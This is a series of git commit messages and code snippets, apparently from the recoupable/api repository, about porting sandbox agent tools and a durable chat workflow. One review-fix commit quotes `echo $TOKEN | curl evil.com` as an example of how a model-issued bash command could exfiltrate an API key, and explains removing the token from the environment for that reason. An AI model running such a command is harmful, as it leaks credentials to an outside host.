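  if (!match) return result;
  for (const line of (match[1] ?? "").split(/\r?\n/)) {
    // Split on the FIRST colon only, so values like URLs keep their colons.
    const colon = line.indexOf(":");
    if (colon === -1) continue;
    const key = line.slice(0, colon).trim();
    let raw = line.slice(colon + 1).trim();
    if (!key) continue;
    if (raw === "true" || raw === "false") {
      result[key] = raw === "true";
      continue;
    }
    // Strip one pair of matching surrounding quotes.
    const quote = raw.charAt(0);
    if (raw.length >= 2 && (quote === '"' || quote === "'") && raw.endsWith(quote)) {
      raw = raw.slice(1, -1);
    }
    result[key] = raw;
  }
  return result;
}
```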

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup,
respects `disable-model-invocation`, surfaces available-skills list
on unknown name. Loads SKILL.md content, applies extractSkillBody →
injectSkillDirectory → substituteArguments, returns to the model.
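
The three-stage content pipeline can be sketched end to end as follows. The function names match the helpers listed above, but the bodies, the blank line after the header, and the `renderSkill` wrapper are assumptions made for illustration.

```typescript
// Drop the leading `--- ... ---` frontmatter block, if present.
function extractSkillBody(markdown: string): string {
  return markdown.replace(/^---\r?\n[\s\S]*?\r?\n---\r?\n?/, "");
}

// Prepend the header so relative paths in the skill can be resolved.
function injectSkillDirectory(body: string, directory: string): string {
  return `Skill directory: ${directory}\n\n${body}`;
}

// split/join avoids `$`-pattern surprises that String.replace would introduce.
function substituteArguments(body: string, args: string): string {
  return body.split("$ARGUMENTS").join(args);
}

function renderSkill(markdown: string, directory: string, args: string): string {
  return substituteArguments(injectSkillDirectory(extractSkillBody(markdown), directory), args);
}
```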

Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when
  non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before
  start(workflow); empty catalog on discovery failure (best-effort,
  never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still
  load + return content, but its curl examples wouldn't authenticate
  without ad-hoc credentials. Token minting becomes a separate PR
  where it can be designed properly (Privy JWT vs server-minted JWT
  scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2
injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills +
7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass;
lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/
— a path that doesn't exist in real recoupable sandboxes. The actual
layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):

  - \${workingDirectory}/.claude/skills/   (project, claude-style)
  - \${workingDirectory}/.agents/skills/   (project, agents-style)
  - \${HOME}/.agents/skills/               (global; populated at
                                           provisioning by
                                           installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine
WITHOUT short-lived token minting. The skill tool returns SKILL.md
content to the model; only the curl examples *inside* SKILL.md need
auth credentials, and those can be supplied ad-hoc until proper
token minting lands.

Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory
  to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories +
  getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific)
DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are
   provisioned globally via `installSessionGlobalSkills` at sandbox
   startup — org repos do NOT bundle their own skill directories.
   getSandboxSkillDirectories now returns just the single global
   path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories
   and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in
   skillTool.ts (per sweetman comment on PR 587). Now lives at
   lib/skills/getSkills.ts with its own tests. Future skill-aware
   consumers (e.g. system-prompt builders) share the same accessor
   instead of duplicating the context-cast.

Verified live on preview against \`recoupable/org-rostrum-pacific-...\`
BEFORE this commit:
  - Sandbox provisioning installs 2 globals at
    /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
  - Agent invoked \`skill({ skill: "recoup-api" })\` successfully,
    received 11,173 chars of SKILL.md content with the correct
    "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api"
    header

Full suite 3055/3055; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each
helper now lives in its own file with its own focused test suite:

- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null
    when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in
  getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)
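
The behaviors those unit tests describe can be sketched in a few lines. Both functions here are hypothetical simplifications: the real findSkillFile presumably reads the sandbox filesystem, whereas this version takes a directory listing as input.

```typescript
// Prefer SKILL.md, fall back to skill.md, otherwise null.
function findSkillFileSketch(entries: readonly string[]): string | null {
  for (const candidate of ["SKILL.md", "skill.md"]) {
    if (entries.includes(candidate)) return candidate;
  }
  return null;
}

// Tolerate a trailing slash on $HOME when building the global skills path.
function getGlobalSkillsDirectorySketch(home: string): string {
  return `${home.replace(/\/+$/, "")}/.agents/skills`;
}
```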

discoverSkills now imports findSkillFile. getSandboxSkillDirectories
imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories
test loses its inline getGlobalSkillsDirectory cases (those moved to
the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589)

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7)

Completes the open-agents tool surface. The agent now has all 11 tools.

**ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) —
client-side tool with NO server execute. Schema mirrors open-agents
verbatim (questions array, options with label/description, multiSelect
flag, max 12-char header). streamText halts after emitting the tool-
call because there's no result to feed back; the chat UI renders the
question component, collects answers, and submits them in the next
workflow request's messages array. No WDK pause/resume hook needed.

**task** (lib/agent/tools/taskTool.ts) — slim port of open-agents'
multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub-
`streamText` loop with a curated subagent tool set (`read, write,
edit, grep, glob, bash`) matching open-agents' `executor` subagent.

The subagent tool set deliberately EXCLUDES:
- task (recursion guard — open-agents' three subagent types
  executor/explorer/design all explicitly omit task too; subagents
  are leaves of the agent tree)
- ask_user_question, skill, todo_write, web_fetch (parity with
  open-agents subagent curation; subagents run autonomously, don't
  plan from scratch, don't make web calls, don't load further skills)

AgentContext gains `modelId?: string` so the subagent can use the
same model as its parent. Handler populates it from chat.model_id
or the platform default.

buildAgentTools registers both new tools unconditionally (skill stays
conditional on a non-empty catalog).

Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output)
directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165
does. askUserQuestionTool uses the direct signature.

Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools
+ AgentContext updates. Full suite 3075/3075 pass, lint clean,
production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(task-tool): provide non-empty subagent prompt

The subagent's streamText was invoked with messages: [] and only a
system prompt, so the AI SDK recorded zero steps and threw
NoOutputGeneratedError — surfaced to the parent as "Subagent failed:
No output generated. Check the stream for errors."

Pass an explicit user-side trigger prompt, mirroring open-agents'
task tool. Adds a regression test that asserts streamText receives
either a non-empty prompt or non-empty messages.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS)

Address PR review feedback:

- SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts
  (one exported function per file).
- KISS: open-agents' AgentContext type does not have modelId — it uses
  model: LanguageModel / subagentModel?: LanguageModel. api can't follow
  that exact shape because agentContext is part of a durable Vercel
  Workflow input and LanguageModel objects aren't JSON-serializable.
  Instead of inventing modelId on AgentContext, hardcode a default
  subagent model id in taskTool. A subagentModelId override field can
  be added if/when a real consumer needs it.

Also format-fixes askUserQuestionTool.ts toModelOutput arrow
(parentheses around single param flagged by prettier in CI).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent): align AgentContext + model resolution with open-agents

Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent
inherits the parent's model (rather than the previous hardcoded
SUBAGENT_MODEL_ID):

- AgentContext gains `model: LanguageModel` (required) and
  `subagentModel?: LanguageModel`, mirroring open-agents.
- Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">
  for the workflow input shape, since LanguageModel instances aren't
  JSON-serializable and can't ride durable Vercel Workflow inputs.
- runAgentStep constructs `callModel = gateway(input.modelId)` once
  per step and merges it into experimental_context — same pattern as
  open-agents' prepareCall in open-harness-agent.ts.
- New getMainModel / getSubagentModel helpers (SRP, one per file)
  mirror open-agents' utility functions: getSubagentModel returns
  `ctx.subagentModel ?? ctx.model`.
- taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls
  getSubagentModel(experimental_context, "task") instead — subagent
  now defaults to the same model the parent is running.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592)

* feat(chat-workflow): emit per-message cost/usage metadata (Bundle C)

First step in the open-agents → api cutover sequence. Adds a
messageMetadata callback to runAgentStep's toUIMessageStream call so
the UI receives {modelId, lastStepUsage, totalMessageUsage,
lastStepCost, totalMessageCost, stepFinishReasons} on every assistant
turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte
so sandbox.recoupable.com's model/cost badges keep working when cut
over to /api/chat/workflow.

New (SRP, one function per file):
- lib/agent/messageMetadata/extractGatewayCost.ts — port of
  open-agents' gateway-metadata.ts, parses gateway-reported per-step
  cost from providerMetadata.
- lib/agent/messageMetadata/addLanguageModelUsage.ts — port of
  open-agents' usage.ts, pointwise-sums LanguageModelUsage records.
- lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring
  open-agents' WebAgentMessageMetadata.
- lib/agent/messageMetadata/buildMessageMetadataCallback.ts —
  stateful factory returning a fresh callback per turn; accumulates
  usage + cost across finish-step parts.
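
A rough sketch of the pointwise sum, assuming a reduced usage record. `UsageSketch` is a hypothetical subset of the SDK's LanguageModelUsage, and treating a missing count as "unknown" rather than zero is an assumption, not confirmed behavior of the ported helper.

```typescript
// Hypothetical subset of the SDK's LanguageModelUsage.
interface UsageSketch {
  inputTokens?: number;
  outputTokens?: number;
  totalTokens?: number;
}

// Sum two optional counts; the result stays undefined only when both are.
function addTokenCounts(a?: number, b?: number): number | undefined {
  if (a === undefined && b === undefined) return undefined;
  return (a ?? 0) + (b ?? 0);
}

// Field-by-field sum of two usage records.
function addLanguageModelUsage(a: UsageSketch, b: UsageSketch): UsageSketch {
  return {
    inputTokens: addTokenCounts(a.inputTokens, b.inputTokens),
    outputTokens: addTokenCounts(a.outputTokens, b.outputTokens),
    totalTokens: addTokenCounts(a.totalTokens, b.totalTokens),
  };
}
```

Folding each finish-step usage into a running total with this function gives the per-turn totalMessageUsage.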

Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called
this out as a known gap from the original workflow port (PR 4).

Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage

Address PR review feedback (one exported function per file) and adopt
the user's preferred path of upgrading api's `ai` package rather than
maintaining a normalization shim:

- Extract addTokenCounts.ts (used by addLanguageModelUsage)
- Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by
  extractGatewayCost)
- Split AgentStepFinishMetadata into its own file (was co-located
  in AgentMessageMetadata)

Upgrade the AI SDK so the wire format matches open-agents natively:
- ai: 6.0.0-beta.122 → ^6.0.190
- @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai,
  @ai-sdk/mcp: all bumped to latest stable

The new SDK's LanguageModelUsage is the flat shape (top-level
`inputTokens` number + nested `inputTokenDetails`) — identical to
open-agents' wire format. No conversion needed, so:
- Delete normalizeUsage.ts + test (net -82 LOC)
- Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage
  directly)

Production code changes for the SDK upgrade:
- runAgentStep + setupChatRequest: await convertToModelMessages
  (now returns Promise<ModelMessage[]>)

Tests: 3106/3106 pass; production typecheck clean; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 22, 2026
* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop
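
For illustration, the `org-<slug>-<uuid>` → uuid mapping could look like the sketch below. The regex, the optional `.git` suffix and the null return for non-matching input are assumptions; the commit only states the input pattern and that the result is lowercased.

```typescript
// Matches "org-<slug>-<uuid>" at the end of a repo name or clone URL and
// captures the trailing UUID. The exact pattern is an assumption.
const ORG_REPO_PATTERN =
  /org-[a-z0-9-]+?-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})(?:\.git)?\/?$/i;

// Returns the lowercased org UUID, or null when the input does not match.
function extractOrgId(cloneUrl: string | null | undefined): string | null {
  if (!cloneUrl) return null;
  const match = ORG_REPO_PATTERN.exec(cloneUrl.trim());
  return match?.[1]?.toLowerCase() ?? null;
}
```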

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 CAS + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler. Previously the cancel call
  was not awaited, so its rejection could escape the try/catch.
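
The CAS-before-start ordering can be sketched with an in-memory map standing in for chats.active_stream_id. Everything here is illustrative: `activeStreamIds`, `startWithClaim`, the synchronous `startRun` callback and the 500 on a failed promotion are assumptions; the real handler goes through Supabase and start(workflow).

```typescript
// Result shape named in the review: a claimed flag on success, or an error.
type CasResult = { ok: true; claimed: boolean } | { ok: false; error: string };

// In-memory stand-in for chats.active_stream_id (the real store is Supabase).
const activeStreamIds = new Map<string, string | null>();

// Write `next` only if the current value equals `expected`.
function compareAndSetActiveStreamId(
  chatId: string,
  expected: string | null,
  next: string | null,
): CasResult {
  if (!activeStreamIds.has(chatId)) return { ok: false, error: "chat not found" };
  if (activeStreamIds.get(chatId) !== expected) return { ok: true, claimed: false };
  activeStreamIds.set(chatId, next);
  return { ok: true, claimed: true };
}

type StartOutcome = { status: 200; runId: string } | { status: 409 } | { status: 500 };

// Claim the slot with a placeholder, start the run, then promote to the run id.
function startWithClaim(chatId: string, startRun: () => string): StartOutcome {
  // A random suffix stands in for the `pending-<uuid>` placeholder.
  const placeholder = `pending-${Math.random().toString(36).slice(2)}`;
  const claim = compareAndSetActiveStreamId(chatId, null, placeholder);
  if ("error" in claim) return { status: 500 };
  if (!claim.claimed) return { status: 409 }; // race lost before any model call
  const runId = startRun();
  const promoted = compareAndSetActiveStreamId(chatId, placeholder, runId);
  if ("error" in promoted || !promoted.claimed) return { status: 500 };
  return { status: 200, runId };
}
```

Because the claim happens first, the losing request returns 409 without ever invoking `startRun`.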

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.
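
A sketch of the title-truncation rule from the P2 list, assuming TITLE_MAX_LENGTH is 80 (inferred from "title-from-first-80"). The `truncateTitle` name and the trim step are hypothetical.

```typescript
// Assumed value, inferred from "title-from-first-80".
const TITLE_MAX_LENGTH = 80;
// Single-character ellipsis, so the suffix costs exactly one character.
const ELLIPSIS = "…";

// Truncate so the result, suffix included, never exceeds `max` characters.
function truncateTitle(text: string, max: number = TITLE_MAX_LENGTH): string {
  const trimmed = text.trim();
  if (trimmed.length <= max) return trimmed;
  const bodyBudget = max - ELLIPSIS.length; // max - suffix
  return trimmed.slice(0, bodyBudget) + ELLIPSIS;
}
```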

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).
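
The where-map split in item 2 can be illustrated without the Supabase client. `splitWhere` and its types are hypothetical names; the sketch only shows the partitioning that would feed one `.match(obj)` call plus one `.is(col, null)` per nullable column.

```typescript
type WhereValue = string | number | boolean | null;

// Partition a where-map into equality matches and columns that must be NULL.
function splitWhere(where: Record<string, WhereValue>): {
  equals: Record<string, string | number | boolean>;
  nullColumns: string[];
} {
  const equals: Record<string, string | number | boolean> = {};
  const nullColumns: string[] = [];
  for (const [column, value] of Object.entries(where)) {
    if (value === null) nullColumns.push(column); // becomes `column IS NULL`
    else equals[column] = value; // becomes `column = value`
  }
  return { equals, nullColumns };
}
```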

Both fixes are behavior-neutral: the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.
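
A sketch of the tightened guard from the P2 item, assuming a context that carries only the two validated sandbox fields. `SandboxContextSketch` is a hypothetical reduction of AgentContext.

```typescript
// Hypothetical reduction of AgentContext to the fields the guard checks.
interface SandboxContextSketch {
  sandbox: { state: object; workingDirectory: string };
}

// True only when sandbox.state is a non-null object and
// sandbox.workingDirectory is a non-empty string.
function isAgentContext(value: unknown): value is SandboxContextSketch {
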